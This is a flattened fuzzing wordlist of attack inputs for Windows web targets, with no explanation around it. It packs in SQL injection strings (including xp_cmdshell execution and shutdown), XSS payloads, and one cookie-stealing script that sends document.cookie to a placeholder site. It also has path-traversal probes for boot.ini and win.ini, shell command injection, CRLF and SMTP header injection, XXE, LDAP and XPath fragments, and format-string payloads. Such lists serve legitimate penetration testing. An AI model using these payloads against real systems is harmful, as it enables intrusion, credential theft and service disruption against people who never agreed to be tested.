# a wide sample of malicious input for windows targets A TRUE FALSE 0 00 1 -1 1.0 -1.0 2 -2 -20 65536 268435455 -268435455 2147483647 0xfffffff NULL null \0 \00 < script > < / script> %0a %00 +%00 \0 \0\0 \0\0\0 \00 \00\00 \00\00\00 $null $NULL `dir` \nnetstat -a%\n \"blah |dir| ";id" dir%00 dir%00| |dir |dir| |/bin/ls -al ?x= ?x=" ?x=| ?x=> /boot.ini ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| ../../boot.ini /../../../../../../../../%2A %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini ../../../../../../../../conf/server.xml C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini %0d%0aX-Injection-Header:%20AttackValue !@#0%^#0##018387@#0^^**(() %01%02%03%04%0a%0d%0aADSF /,%ENV,/   % # * } ; / \ \\ \\/ \\\\* \\\\?\\ < < < < < << <<< | || ` - -- *| ^' \' /' @' (') {'} ['] *' #' !' !@#$%%^#$%#$@#$%$$@#$%^^**(() %01%02%03%04%0a%0d%0aADSF \t "\t" #xD #xA #xD#xA #xA#xD /%00/ %00/ %00 xxx

yyy "> < '> '> \";alert('XSS');// %3cscript%3ealert("XSS");%3c/script%3e %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E <script>alert(document.cookie); <script>alert(document.cookie);<script>alert "> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E "> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} '';!--"=&{()} ' " # - -- ' -- --'; ' ; = ' = ; = -- \x23 \x27 \x3D \x3B' \x3D \x27 \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ';shutdown-- <>"'%;)(&+ ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset <>"'%;)(&+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT '%20OR 'sqlattempt1 (sqlattempt2) | %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ','')); phpinfo(); exit;/* var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> SCRIPT]]>alert('XSS');/SCRIPT]]> ]>&xxe; ]>&xxe; ]>&xxe; ]>&xxe; ]]> <IMG SRC="javascript:alert('XSS')"> XSS ' '-- ' or 1=1-- 1 or 1=1-- ' or 1 in (@@version)-- 1 or 1 in (@@version)-- '; waitfor delay '0:30:0'-- 1; waitfor delay '0:30:0'-- '||Utl_Http.request('http://') from dual-- 1||Utl_Http.request('http://') from dual-- xsstest xsstest%00"<>' )))))))))) ../../../../../../../../../../boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini ../../../../../../../../../../windows/win.ini ..\..\..\..\..\..\..\..\..\..\windows\win.ini || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & | ping -i 30 127.0.0.1 | | ping -n 30 127.0.0.1 | & ping -i 30 127.0.0.1 & & ping -n 30 127.0.0.1 & ; ping 127.0.0.1 ; %0a ping -i 30 127.0.0.1 %0a `ping 127.0.0.1` ;echo 111111 echo 111111 response.write 111111 :response.write 111111 http:/// %0aCc: %0d%0aCc: %0aBcc: %0d%0aBcc: %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a # known cross platform source Code, file disclosure attack patterns - append after file or dir path %70 .%E2%73%70 %2e0 %2e . \ ?* %20 %00 %2f %5c count(/child::node()) x' or name()='username' or 'x'='y var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> "SCRIPT]]>alert('XSS');/SCRIPT]]>" "" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]]>" "cript:alert('XSS')"">" "" "XSS" %00 NULL null ' " ; "> %0d %0a %7f %ff -1 other %s%p%x%d %99999999999s %08x %20d %20n %20x %20s %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n